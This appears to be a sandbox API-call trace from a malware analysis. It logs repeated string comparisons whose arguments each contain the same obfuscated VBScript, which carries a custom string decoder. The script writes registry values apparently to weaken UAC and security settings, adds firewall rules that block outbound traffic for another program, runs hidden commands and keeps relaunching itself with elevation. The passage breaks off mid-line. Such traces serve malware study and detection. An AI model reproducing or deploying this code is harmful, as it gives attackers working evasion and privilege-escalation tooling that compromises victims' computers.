bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 107 [0222.936] wcsncmp (_String1="4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 39 [0222.936] wcsncmp (_String1=", sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 31 [0222.936] wcsncmp (_String1=" sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0222.936] wcsncmp (_String1="sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra 